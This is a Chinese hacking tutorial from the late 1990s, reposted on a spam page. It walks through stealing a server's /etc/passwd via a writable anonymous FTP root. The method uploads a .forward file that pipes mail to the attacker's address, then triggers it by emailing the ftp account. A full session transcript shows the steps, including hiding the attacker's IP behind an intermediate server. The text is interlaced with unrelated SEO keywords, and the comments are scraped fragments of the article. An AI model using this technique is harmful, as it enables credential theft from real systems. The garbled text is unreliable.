防灾减灾的手抄报 简单漂亮-斗志昂扬的反义词

匿名FTP 的漏洞 2022年月6日发(作者:不断的近义词)

匿 名 FTP 的 漏 洞



Love-gone 著



[前言]





对于著作这份文章的目的并不是在于教育,因为个人觉得台湾的网路虽然已经有所发展了四海逸家,但是对于网路安全的重要性却是漠不关心花嫁丽舍私人婚礼会所,或者是没有足够的知识,这是相当危险的一个现象..就算是大专院校、政府机构、公司行号...甚至是网路业者、ISP对于网路安全和系统管理的正确观念和态度实在是相当缺乏薄荷怎么吃。所以说不定在往后的日子里一号家居网,只要一台pc和一台数据机,就可以让整个台湾网路崩溃....甚至是引起经济危机!就像是一个小孩子拿著一把在路上逛一样...Too

Bad!!所以我写这篇文章纯粹是为了台湾网路安全而写的。并不希望有人因为这篇文章而去做违法的事情~~尤其是破坏别人的系统或是档案!当然啦韩素英,如果有人因此做了违法的事情,本人概不负责!



"水能载舟也覆舟"....只是告诉你骇客是如何入侵你的系统象山绿城百合公寓。





好像说要做F&Q..如果位对于网路系统安全有问题的可以写信来问我!!当然我也不是GOD不是说每一个问题我一定会~~但是我会尽力回答每一个人的问题高天上流云简谱,并不会说不知道就假装没看到这个问题,ok?



[主题]



匿名FTP的漏洞 (Anonymous FTP)



[困难度]



普通



[说明]





目前有很多的主机都有提供匿名FTP的服务,而方便和安全性却是鱼与熊掌不能两得的!!就像我以前说的万利达集团有限公司,现在的系统管理员大多数都是缺少专业观念的!!!对于FTP也是一样移动网络,很多系统管理员都为了避免麻烦就用系统的预设设定来提供FTP这个服务.而anonymous

ftp却是有许多漏洞须要我们去探讨的.



哇~~今天说话的口气怎么变得好专业阿!!



[开始]



今天就先说明一下台湾目前anonymous ftp最常犯的错误!然而这些错误却常常是系统安全的大漏洞.



一开始先说明怎么把整个/etc/passwd抓回来.再说明如何任意的不用密码就能进入系统.



如果ftp的根目录是可以写入的或是可以执行程式.那你就可以把系统的/etc/passwd给抓回来了!!方法就是先做一个传送档

.forward基因工程原理,然后ftp到主机上用anonymous进入.把你做的.forward

上传到它的根目录下.确定上传完毕后就可以离开了!在寄一封e-mail给那个主机的anonymous的帐号..大多帐号是ftp!然后你就可以去收收你的信箱了..什么还不懂阿?意思就是说/etc/passwd已经传到你的信箱了啦!赶快存好怎么回qq密码,拿约翰出来跑路吧!!



其方法说明如下:





SunOS 5.6



login: lovegone

Password:

Last login: Sat May 16 19:07:41 from 11.22.20.122

tcsh: getwd: Cannot open directory "../" (Permission denied)

tcsh: Trying to start from "/home/judge4"

Sun Microsystems Inc. SunOS 5.6 Generic August 1997

Copyright by Andrew Chen 98/01/07

You have new mail.

#



(嘿嘿..先连到我的中间伺服器!

有人问说[一定要先有一

个主机来当中间伺服器才能hack别人的主机吗?].当然不是这个意思啦!先连上中间伺服器只是要用来掩饰自己的ip嘛!而且可以利用中间伺服器来使用et-Man2所说的那些"中间动作"阿!!所以中间伺服器不是说一定要用南博会,但是却是很重要喔..)







# finger @



[]

Login ame TTY Idle When Where

root Super-User cole 10: Tue 09:05 :0



(没人在家...真好)





# ftp

Connected to .

220 cc FTP server (Version wu-2.4(1) Thu May 0 18:00:41 CST 1996) ready.

ame (:lovegone): anonymous (或是ftp,只要先匿名进去就好了)

1 Guest login ok珠江商报, send your complete e-mail address as password.

Password:

20-

20- ###### ##### #####

20- # # # #

20- ##### # # #

20- # # #####

20- # # #

20- # # #

20-

20- **** 欢迎到烂公司 ****

20-

20- IE40 : pub/ie40 : 正式版.非抢鲜版

20- pub/ie40zip: ie40 zip.

20-

20 Guest login ok要间康, access restricti apply.

Remote system type is UIX.

Using binary mode to transfer files.

ftp>



(不愧是烂公司.连ftp也都是wu-2.4的..漏洞大的"狠")





ftp> pwd

257 "/" is current directory.



(看一下自己在那里茶乡,因为有些ftp会一开始就在帐号的工作目录下.我们要确保是在根目录下!如果不是在根目录下的人就用cd ..就可以到根目录了)



ftp> ls



(看根目录的设定)



200 PORT command successful.

150 Opening ASCII mode data connection for /bin/ls.

total 18

drwxr-xr-x 7 Taiwan 512 Oct 16 1997 .

drwxr-xr-x 7 Taiwan 512 Oct 16 1997 ..

lrwxrwxrwx 1 Taiwan 7 Jun 17 1997 bin -> usr/bin

dr-xr-xr-x 2 Taiwan 512 May 1 1996 dev

d--x--x--x 2 Taiwan 512 May 1 1996 etc

dr-xr-xr-x 15 ftp Taiwan 512 Feb 1 0:40 pub

drwxr-xr-x 2 ftp Taiwan 512 Apr 1 05:59 upload

drwxr-xr-x 5 Taiwan 512 May 1 1996 usr

-rw-r--r-- 1 Taiwan 488 Oct 8 1997

226 Transfer complete.



("狠"好!根目录是drwxr-xr-x 可以执行程式.赶快去做一个.forward吧!!!)



ftp> bye

Goodbye!



# echo "|/bin/mail Lovegone@" > shit



(用echo和输出导向就可以了..)



# ls -la





total 26

drwxr-xr-x 4 lovegone users 1024 May 14 1:56 ./

drwxr-xr-x 47 root root 1024 ov 26 14:08 ../

-rw-r--r-- 1 lovegone users 2217 May 14 1:56 .bash_history

-rw-r--r-- 1 lovegone users 164 Jun 10 1996 .kermrc

-rw-r--r-- 1 lovegone users 4 Jun 7 199 .less

-rw-r--r-- 1 lovegone users 114 ov 24 199 .lessrc

drwxr-xr-x 2 lovegone users 1024 Jun 10 1996 .term/

-rw-rw-r-- 1 lovegone users 6116 May 7 1997

-rw------- 1 lovegone users 982 May 14 1:49 mbox

drwxr-xr-x 8 lovegone users 1024 Jul 28 1997 public_html/

-rw-r--r-- 1 lovegonw users 8 Jul 5 1998 shit



(ok了!!接下来就是把shit上传到上当.forward)



# ftp

Connected to .

220 cc FTP server (Version wu-2.4(1) Thu May 0

18:00:41 CST 1996) ready.

ame (:lovegone): anonymous (或是ftp银川住宿,只要先匿名进去就好了)

1 Guest login ok深圳日租房, send your complete e-mail address as password.

Password:

20-

20- ###### ##### #####

20- # # # #

20- ##### # # #

20- # # #####

20- # # #

20- # # #

20-

20- **** 欢迎到烂公司 ****

20-

20- IE40 : pub/ie40 : 正式版.非抢鲜版

20- pub/ie40zip: ie40 zip.

20-

20 Guest login ok, access restricti apply.

Remote system type is UIX.

Using binary mode to transfer files.

ftp> put shit .forward



(上传记得要改成 .forward才行黄连木价格,别在用shit)



200 PORT command successful.

226 Transfer complete.



ftp> bye

Goodbye!



(寄一封信给anonymous这个帐号..然后去收收你的信箱吧!)





[Love-gone的话]



想不到竟然只说了利用 .forward来传/etc/passwd的方法!至于任意进出系统而不用密码的方法就只好等下次再说了...别说我又偷懒了!



最近都没有继续的写文章了,必竟hack只是兴趣而已!而生活中却有很多事要做..好累人 :-(

虽然hack只是兴趣,但是love-gone却是很认真的哟 !!

love-gone希望以后能够从事跟电脑相关的工作,但是台湾的填鸭式教育却让love-gone很吃力 :-(



希望love-gone还是能有空来帮喜欢hack的朋友写文章或回答问题 :-)



[感言]



还是老话一句...系统漏洞大都都是人为的疏失!!这是很重要的一点苍是什么颜,希望是系统管理员的读者看到这文章能有所改进.



Love-gone的E-mail信箱: lovegone@

Love-gone的ICQ#:



这份文章的著作权是属于Love-gone所有.禁止任何人未经许可擅自破坏其文章的完整性.





阳台葡萄种植技术-林海英

匿名FTP 的漏洞

点赞(159)

Comment list 共有 16 条评论

湿热体质 28 minutes ago 回复TA

因为有些ftp会一开始就在帐号的工作目录下.我们要确保是在根目录下!如果不是在根目录下的人就用cd ..就可以到根目录了)ftp> ls(看根目录的设定)200 PORT command successful.150 Opening ASCII mode data connection for /bin/ls.total 18drwxr-xr-x 7 Taiwan 512 Oct 16 1997 .drwxr-xr-x 7 Taiwan 512 Oct 16 1997 ..lrwxrwxrwx 1 Taiwan 7 Jun 17 1997 bin -> usr/bindr-xr-xr-x 2 Taiwan 512 May 1 1996 devd--x--x--x 2 Taiwan 512 May 1 1996 etcdr-xr-xr-x 15 ftp Taiwan 512 Feb 1 0

电脑功放软件 20 minutes ago 回复TA

-)[感言]还是老话一句...系统漏洞大都都是人为的疏失!!这是很重要的一点苍是什么颜

中国动漫产业 19 minutes ago 回复TA

49 mboxdrwxr-xr-x 8 lovegone users 1024 Jul 28 1997 public_html/-rw-r--r-- 1 lovegonw users 8 Jul 5 1998 shit(ok了!!接下来就是把shit上传到上当.forward)# ftp Connected to .220 cc FTP server (Version wu-2.4(1) Thu May 0 18

沈阳工大 19 minutes ago 回复TA

ISP对于网路安全和系统管理的正确观念和态度实在是相当缺乏薄荷怎么吃

杀戮季节 7 minutes ago 回复TA

然后ftp到主机上用anonymous进入.把你做的.forward 上传到它的根目录下.确定上传完毕后就可以离开了!在寄一封e-mail给那个主机的anonymous的帐号..大多帐号是ftp!然后你就可以去收收你的信箱了..什么还不懂阿?意思就是说/etc/passwd已经传到你的信箱了啦!赶快存好怎么回qq密码

江门网站制作 7 minutes ago 回复TA

00

昆山房价 1 minute ago 回复TA

56 ./drwxr-xr-x 47 root root 1024 ov 26 14

广州多动症医院 17 minutes ago 回复TA

只要先匿名进去就好了)1 Guest login ok珠江商报

敏百灵 4 minutes ago 回复TA

只要先匿名进去就好了)1 Guest login ok深圳日租房

英国脱欧白皮书 13 minutes ago 回复TA

只要先匿名进去就好了)1 Guest login ok深圳日租房

千岛湖论坛 25 minutes ago 回复TA

必竟hack只是兴趣而已!而生活中却有很多事要做..好累人

南京皮肤病 1 minute ago 回复TA

而方便和安全性却是鱼与熊掌不能两得的!!就像我以前说的万利达集团有限公司

怀孕七个月胎儿图 3 minutes ago 回复TA

希望是系统管理员的读者看到这文章能有所改进.Love-gone的E-mail信箱

44420 14 minutes ago 回复TA

00

hourglass 12 minutes ago 回复TA

但是对于网路安全的重要性却是漠不关心花嫁丽舍私人婚礼会所

微信小程序

微信扫一扫体验

立即
投稿
发表
评论
返回
顶部